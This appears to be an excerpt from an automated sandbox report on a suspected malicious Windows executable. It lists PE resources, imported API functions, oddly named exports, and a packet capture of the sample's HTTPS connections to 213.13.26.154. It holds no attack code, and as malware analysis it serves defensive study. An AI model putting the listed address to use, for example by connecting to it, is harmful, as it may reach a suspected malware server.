                  RT_BITMAP0x629eac0x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 1728, resolution 3780 x 3780 px/mEnglishUnited States0.04242081447963801
                  RT_BITMAP0x62a5940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                  RT_DIALOG0x62a67c0x52data0.7682926829268293
                  RT_DIALOG0x62a6d00x52data0.7560975609756098
                  RT_STRING0x62a7240x4c4data0.35655737704918034
                  RT_STRING0x62abe80xb38data0.2416434540389972
                  RT_STRING0x62b7200x9d8data0.3115079365079365
                  RT_STRING0x62c0f80x4c8data0.3333333333333333
                  RT_STRING0x62c5c00x428data0.3825187969924812
                  RT_STRING0x62c9e80x604data0.35
                  RT_STRING0x62cfec0x66cdata0.347323600973236
                  RT_STRING0x62d6580x3e8data0.401
                  RT_STRING0x62da400x2e0data0.485054347826087
                  RT_STRING0x62dd200x408data0.40406976744186046
                  RT_STRING0x62e1280x2f4data0.4007936507936508
                  RT_STRING0x62e41c0x4bcdata0.36303630363036304
                  RT_STRING0x62e8d80x6f4data0.2876404494382023
                  RT_STRING0x62efcc0x4b8data0.3708609271523179
                  RT_STRING0x62f4840x4a4data0.3846801346801347
                  RT_STRING0x62f9280x42cAmigaOS bitmap font "e", fc_YSize 18176, 20992 elements, 2nd "\034", 3rd "h"0.4054307116104869
                  RT_STRING0x62fd540x320data0.42375
                  RT_STRING0x6300740x454data0.4052346570397112
                  RT_STRING0x6304c80x380data0.43638392857142855
                  RT_STRING0x6308480x3a4data0.3465665236051502
                  RT_STRING0x630bec0x28cdata0.4647239263803681
                  RT_STRING0x630e780x444data0.3708791208791209
                  RT_STRING0x6312bc0x560data0.34665697674418605
                  RT_STRING0x63181c0x594data0.23809523809523808
                  RT_STRING0x631db00x56cdata0.2968299711815562
                  RT_STRING0x63231c0x4d4data0.313915857605178
                  RT_STRING0x6327f00x4e0data0.34775641025641024
                  RT_STRING0x632cd00x350data0.42924528301886794
                  RT_STRING0x6330200x4e4data0.3634185303514377
                  RT_STRING0x6335040x6d0data0.35493119266055045
                  RT_STRING0x633bd40x7c0data0.3321572580645161
                  RT_STRING0x6343940x750data0.3530982905982906
                  RT_STRING0x634ae40x660data0.3805147058823529
                  RT_STRING0x6351440x574data0.37750716332378226
                  RT_STRING0x6356b80x544data0.3115727002967359
                  RT_STRING0x635bfc0x8d0data0.28324468085106386
                  RT_STRING0x6364cc0x4d0data0.3530844155844156
                  RT_STRING0x63699c0xc78data0.29041353383458646
                  RT_STRING0x6376140x650data0.38366336633663367
                  RT_STRING0x637c640x648data0.3314676616915423
                  RT_STRING0x6382ac0x78cdata0.3167701863354037
                  RT_STRING0x638a380x768data0.2979957805907173
                  RT_STRING0x6391a00x490data0.3544520547945205
                  RT_STRING0x6396300x568data0.3388728323699422
                  RT_STRING0x639b980x52cdata0.3368580060422961
                  RT_STRING0x63a0c40x410data0.4048076923076923
                  RT_STRING0x63a4d40x3ecdata0.35856573705179284
                  RT_STRING0x63a8c00x48cdata0.3238831615120275
                  RT_STRING0x63ad4c0x50cdata0.29566563467492263
                  RT_STRING0x63b2580x3dcdata0.3248987854251012
                  RT_STRING0x63b6340x1ccdata0.5434782608695652
                  RT_STRING0x63b8000x424data0.39811320754716983
                  RT_STRING0x63bc240x9cdata0.717948717948718
                  RT_STRING0x63bcc00xe8data0.6293103448275862
                  RT_STRING0x63bda80x108data0.625
                  RT_STRING0x63beb00x420data0.375
                  RT_STRING0x63c2d00x3d4data0.3795918367346939
                  RT_STRING0x63c6a40x430data0.39365671641791045
                  RT_STRING0x63cad40x570data0.3175287356321839
                  RT_STRING0x63d0440x314data0.3680203045685279
                  RT_STRING0x63d3580x294data0.3151515151515151
                  RT_STRING0x63d5ec0x45cdata0.40949820788530467
                  RT_STRING0x63da480x4a8data0.3624161073825503
                  RT_STRING0x63def00x4c0data0.37417763157894735
                  RT_STRING0x63e3b00x470data0.323943661971831
                  RT_STRING0x63e8200x3b8data0.36239495798319327
                  RT_STRING0x63ebd80x3b0data0.3421610169491525
                  RT_STRING0x63ef880x444data0.39377289377289376
                  RT_STRING0x63f3cc0x200data0.412109375
                  RT_STRING0x63f5cc0xc4data0.6428571428571429
                  RT_STRING0x63f6900x1a4data0.5452380952380952
                  RT_STRING0x63f8340x354data0.431924882629108
                  RT_STRING0x63fb880x498data0.29336734693877553
                  RT_STRING0x6400200x2f8data0.45263157894736844
                  RT_STRING0x6403180x2f0data0.3776595744680851
                  RT_STRING0x6406080x368data0.29243119266055045
                  RT_RCDATA0x6409700xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                  RT_RCDATA0x6416d00xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                  RT_RCDATA0x6424280xcfcPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003309265944645
                  RT_RCDATA0x6431240xcd9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033444816053512
                  RT_RCDATA0x643e000xd5dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032154340836013
                  RT_RCDATA0x644b600xd57PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003221083455344
                  RT_RCDATA0x6458b80xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                  RT_RCDATA0x6465080xc4ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034920634920634
                  RT_RCDATA0x6471580xcb5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033814940055334
                  RT_RCDATA0x647e100xcb0PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033866995073892
                  RT_RCDATA0x648ac00xd56PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032220269478618
                  RT_RCDATA0x6498180xd47PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032362459546926
                  RT_RCDATA0x64a5600xdc2PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031232254400908
                  RT_RCDATA0x64b3240xdc5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031205673758865
                  RT_RCDATA0x64c0ec0xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                  RT_RCDATA0x64cde00xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                  RT_RCDATA0x64dad00xda9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031455533314269
                  RT_RCDATA0x64e87c0xda6PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031482541499714
                  RT_RCDATA0x64f6240xcf3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003318250377074
                  RT_RCDATA0x6503180xcedPNG image data, 36 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033242671501965
                  RT_RCDATA0x6510080x10data1.5
                  RT_RCDATA0x6510180x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                  RT_RCDATA0x6524a40x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                  RT_RCDATA0x6535c40xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                  RT_RCDATA0x6543500x1558data0.42441434846266474
                  RT_RCDATA0x6558a80xa90Delphi compiled form 'TLVOhieVeCyqYsW'0.3572485207100592
                  RT_RCDATA0x6563380x1179PNG image data, 1800 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9579700424770847
                  RT_RCDATA0x6574b40x176cPNG image data, 2400 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9412941961307538
                  RT_RCDATA0x658c200x2cf0PNG image data, 3600 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9631432545201669
                  RT_RCDATA0x65b9100x3970PNG image data, 4800 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9263465723612623
                  RT_RCDATA0x65f2800x1403PNG image data, 1800 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States0.96213156353699
                  RT_RCDATA0x6606840x18adPNG image data, 2400 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9377869241728669
                  RT_RCDATA0x661f340x343fPNG image data, 3600 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9486355140186916
                  RT_RCDATA0x6653740x3ea6PNG image data, 4800 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9183189923930665
                  RT_RCDATA0x66921c0x509PNG image data, 192 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008533747090768
                  RT_RCDATA0x6697280x64ePNG image data, 256 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006815365551425
                  RT_RCDATA0x669d780xb62PNG image data, 384 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9982841455044612
                  RT_RCDATA0x66a8dc0xe43PNG image data, 512 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9726102437688304
                  RT_RCDATA0x66b7200x62fPNG image data, 192 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0069488313329122
                  RT_RCDATA0x66bd500x6d3PNG image data, 256 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0062965082999427
                  RT_RCDATA0x66c4240xe13PNG image data, 384 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9988898140438524
                  RT_RCDATA0x66d2380xf5bPNG image data, 512 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9722716865937421
                  RT_RCDATA0x66e1940xbc3PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036532713384259
                  RT_RCDATA0x66ed580xc58PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034810126582279
                  RT_RCDATA0x66f9b00xbd1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036363636363637
                  RT_RCDATA0x6705840xcfaPNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033112582781456
                  RT_RCDATA0x6712800x644PNG image data, 384 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006857855361596
                  RT_RCDATA0x6718c40x823PNG image data, 512 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00144023043687
                  RT_RCDATA0x6720e80xe08PNG image data, 768 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9618596881959911
                  RT_RCDATA0x672ef00x117cPNG image data, 1024 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9159964253798034
                  RT_RCDATA0x67406c0x787PNG image data, 384 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00570835495589
                  RT_RCDATA0x6747f40x89cPNG image data, 512 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000453720508167
                  RT_RCDATA0x6750900x1189PNG image data, 768 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9607930496769882
                  RT_RCDATA0x67621c0x1251PNG image data, 1024 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9117082533589251
                  RT_GROUP_CURSOR0x6774700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                  RT_GROUP_CURSOR0x6774840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                  RT_GROUP_CURSOR0x6774980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x6774ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x6774c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x6774d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                  RT_GROUP_CURSOR0x6774e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3

                  Imports

                  DLLImport
                  wininet.dllInternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW
                  winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                  comctl32.dllImageList_GetImageInfo, FlatSB_SetScrollInfo, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                  shell32.dllShell_NotifyIconW, SHAppBarMessage, ShellExecuteW
                  user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, CreateAcceleratorTableW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, ShowOwnedPopups, GetSystemMenu, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, DrawFocusRect, EnumChildWindows, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, GetClipboardData, SetClipboardData, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, DrawTextW, SetScrollRange, MonitorFromRect, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, RemovePropW, UpdateWindow, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, EmptyClipboard, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, OpenClipboard, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CloseClipboard, DestroyCursor, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, CopyIcon, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, ValidateRect, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, FindWindowW, DeleteMenu, GetKeyboardLayout
                  version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                  oleaut32.dllSafeArrayPutElement, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, SafeArrayGetElemsize, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, VariantCopyInd, VariantChangeType
                  advapi32.dllRegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, GetUserNameW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
                  msvcrt.dllmemcpy, memset
                  winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                  kernel32.dllSetFileAttributesW, GetFileType, SetFileTime, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, GetSystemDefaultLangID, SizeofResource, TlsAlloc, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, GetCPInfoExW, GetLongPathNameW, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, GetDllDirectoryW, SetDllDirectoryW, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, VerLanguageNameW, GetThreadPriority, GetCurrentProcess, GlobalLock, SetThreadPriority, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, TlsFree, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, CompareStringA, SetEndOfFile, QueryPerformanceCounter, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, SystemTimeToFileTime, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, TzSpecificLocalTimeToSystemTime, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                  SHFolder.dllSHGetFolderPathW
                  ole32.dllIsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
                  gdi32.dllPie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, PolyBezierTo, CreateICW, CreateDCW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetEnhMetaFileDescriptionW, ArcTo, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, Rectangle, SaveDC, DeleteDC, FrameRgn, BitBlt, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

                  Exports

                  NameOrdinalAddress
                  A90x97d118
                  ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX40x97d12c
                  B80x97d11c
                  C70x97d120
                  E60x97d124
                  F50x97d128
                  TMethodImplementationIntercept30x477d50
                  __dbk_fcall_wrapper20x412968
                  dbkFCallWrapperAddr10x99e640

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Apr 27, 2024 03:32:01.269383907 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.269419909 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:01.269575119 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.305517912 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.305536985 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:01.892911911 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:01.892999887 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.952399015 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.952419043 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:01.953399897 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:01.953463078 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:01.957582951 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.004112959 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184384108 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184442997 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184490919 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.184505939 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184531927 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.184565067 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184571981 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.184592009 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.184652090 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.184652090 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.372781038 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.372883081 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.372946978 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.373038054 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.373105049 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.373168945 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.373195887 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.373291969 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.562634945 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.562783957 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.562869072 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.562953949 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.563232899 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.563302994 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.563405991 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.563513994 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.751832962 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.751923084 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939131021 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939284086 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939408064 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939464092 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939527035 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939608097 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939635992 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939723015 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939724922 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939749002 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939795017 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939795017 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.939868927 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939970970 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.939994097 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940004110 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940037966 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940063000 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940072060 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940126896 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940227032 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940318108 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940341949 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940359116 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940396070 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940418005 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940423965 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940462112 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940479994 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940493107 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940571070 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940584898 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940671921 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:32:02.940680027 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940754890 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:32:02.940783978 CEST49735443192.168.2.4213.13.26.154
